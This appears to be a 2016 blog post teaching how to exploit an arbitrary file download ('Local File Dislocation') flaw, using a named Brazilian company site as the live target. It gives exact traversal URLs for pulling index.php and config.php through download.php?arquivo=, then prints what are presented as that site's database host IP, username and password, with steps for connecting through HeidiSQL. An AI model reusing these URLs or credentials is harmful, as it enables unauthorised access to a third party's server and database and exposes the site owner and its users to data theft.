Thursday, 17 March 2016

How to Hack Sites With Local File Dislocation

What Is LFD:-

In Local File Dislocation, Attacker Can Abe To Download Config.php (DataBase) File, And Theft The Db Pass, user Name, Database, Host_name And Connect To The Database Using Some Soft (Hedi Sql), And Than Attacker Login To PhpMyAdmin. In Local File Dislocation Url Shown The Web Server Directory(that Is vulnerable Section)

Ex:-

www.site.com/download.php?arquivo=/home/mturbina2/public_html/sistema/apresentacao.pdf
Ok Lets Start I Have A Website Try To Download

Config File:-

Target:- www.mturbina.com.br/site/download.php?arquivo=/home/mturbina2/public_html/sistema/produtos/kaindl/000000011/pdf/apresentacao.pdf

Step:-1 

Copy And Paste The Target Url On The WebBrowser Url Bar, And Hit Enter.

Step:-2 

If We Can Hit The Enter One File Can Be Download, This File Is Useless, We Only Need To Download The Index.php And Config.php

Step:-3 

Remove The All Url Section After ( download.php?arquivo= ) Or Remove The Url After ( =/home/mturbina2/public_html/ ) Follow Any One Condition I Follow First Condition.

Ex:- (Url Now Look Like This)
www.mturbina.com.br/site/download.php?arquivo=

Step:-4 

Put the ( ../index.php ) After The ?arquivo= Its Use For Directory Jumping Or Send To Back On One Directory on Server. Some Time We Use( ../../../../../../../index.php ) More Than One Time For Correct Location. (But In this Site We Not Need To Jumping To Another Location, So We Not Need To Put (,,/))

Ex:- Now Url Like This:- http://www.mturbina.com.br/site/download.php?arquivo=index.php
You Can See The Index.php File Start To Downloading (Download It)

Step:-5 

Open The Download File(index.php) Open It In Notepad Using This (index.php) We Find Out The Config.php(data Base Connection) File Location We Find out The Successfully Location Of Config File ("../sistema/config.php ")

Step:-6 

Now Donload The ( ../sistema/config.php )
File. And Connect To DataBase.

Ex:- http://www.mturbina.com.br/site/download.php?arquivo=../sistema/config.php

Step:-7 

Open The HeidiSQL Download Here ( http://www.heidisql.com/download.php ) And Put Data Base Entry In this.

Config Entry For HediSql:- Located In Config File
Db_Hostname=179.188.16.14
DbUser=mturbina2
DbPass=turbina72